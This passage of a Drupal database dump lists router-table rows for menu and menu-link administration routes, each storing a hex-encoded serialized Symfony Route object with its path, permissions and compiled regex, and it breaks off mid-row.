('entity.menu.collection', '/admin/structure/menu', '/admin/structure/menu', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f61646d696e2f7374727563747572652f6d656e75223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a343a226d656e75223b733a363a225f7469746c65223b733a353a224d656e7573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31353a2261646d696e6973746572206d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32383a227b5e2f61646d696e2f7374727563747572652f6d656e75247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32313a222f61646d696e2f7374727563747572652f6d656e75223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32313a222f61646d696e2f7374727563747572652f6d656e75223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.menu.config_translation_overview', '/admin/structure/menu/manage/{menu}/translate', '/admin/structure/menu/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a343a226d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36323a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.menu.delete_form', '/admin/structure/menu/manage/{menu}/delete', '/admin/structure/menu/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31313a226d656e752e64656c657465223b733a363a225f7469746c65223b733a31313a2244656c657465206d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31313a226d656e752e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35393a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.menu.edit_form', '/admin/structure/menu/manage/{menu}', '/admin/structure/menu/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a393a226d656e752e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35323a225c44727570616c5c6d656e755f75695c436f6e74726f6c6c65725c4d656e75436f6e74726f6c6c65723a3a6d656e755469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31313a226d656e752e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35323a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33303a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.menu_link_content.canonical', '/admin/structure/menu/item/{menu_link_content}/edit', '/admin/structure/menu/item/%/edit', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35313a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32353a226d656e755f6c696e6b5f636f6e74656e742e64656661756c74223b733a363a225f7469746c65223b733a31343a2245646974206d656e75206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32343a226d656e755f6c696e6b5f636f6e74656e742e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f65646974223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.menu_link_content.content_translation_add', '/admin/structure/menu/item/{menu_link_content}/edit/translations/add/{source}/{target}', '/admin/structure/menu/item/%/edit/translations/add', 247, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38363a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f656469742f7472616e736c6174696f6e732f6164642f7b736f757263657d2f7b7461726765747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a616464223b733a363a22736f75726365223b4e3b733a363a22746172676574223b4e3b733a363a225f7469746c65223b733a333a22416464223b733a31343a22656e746974795f747970655f6964223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32323a226d656e755f6c696e6b5f636f6e74656e742e76696577223b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22637265617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a333a7b733a363a22736f75726365223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a363a22746172676574223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133333a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f656469742f7472616e736c6174696f6e732f616464283f3a2f283f503c736f757263653e5b5e2f5d2b2b29283f3a2f283f503c7461726765743e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22746172676574223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736f75726365223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f656469742f7472616e736c6174696f6e732f616464223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234373b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f656469742f7472616e736c6174696f6e732f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('entity.menu_link_content.content_translation_delete', '/admin/structure/menu/item/{menu_link_content}/edit/translations/delete/{language}', '/admin/structure/menu/item/%/edit/translations/delete', 247, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38323a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f656469742f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a34363a226d656e755f6c696e6b5f636f6e74656e742e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f656469742f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f656469742f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234373b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f656469742f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('entity.menu_link_content.content_translation_edit', '/admin/structure/menu/item/{menu_link_content}/edit/translations/edit/{language}', '/admin/structure/menu/item/%/edit/translations/edit', 247, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38303a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f656469742f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131323a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f656469742f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32333a222f656469742f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234373b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f252f656469742f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('entity.menu_link_content.content_translation_overview', '/admin/structure/menu/item/{menu_link_content}/edit/translations', '/admin/structure/menu/item/%/edit/translations', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36343a222f61646d696e2f7374727563747572652f6d656e752f6974656d2f7b6d656e755f6c696e6b5f636f6e74656e747d2f656469742f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32323a226d656e755f6c696e6b5f636f6e74656e742e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32343a22656e746974793a6d656e755f6c696e6b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38313a227b5e2f61646d696e2f7374727563747572652f6d656e752f6974656d2f283f503c6d656e755f6c696e6b5f636f6e74656e743e5b5e2f5d2b2b292f656469742f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f656469742f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656e752f6974656d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73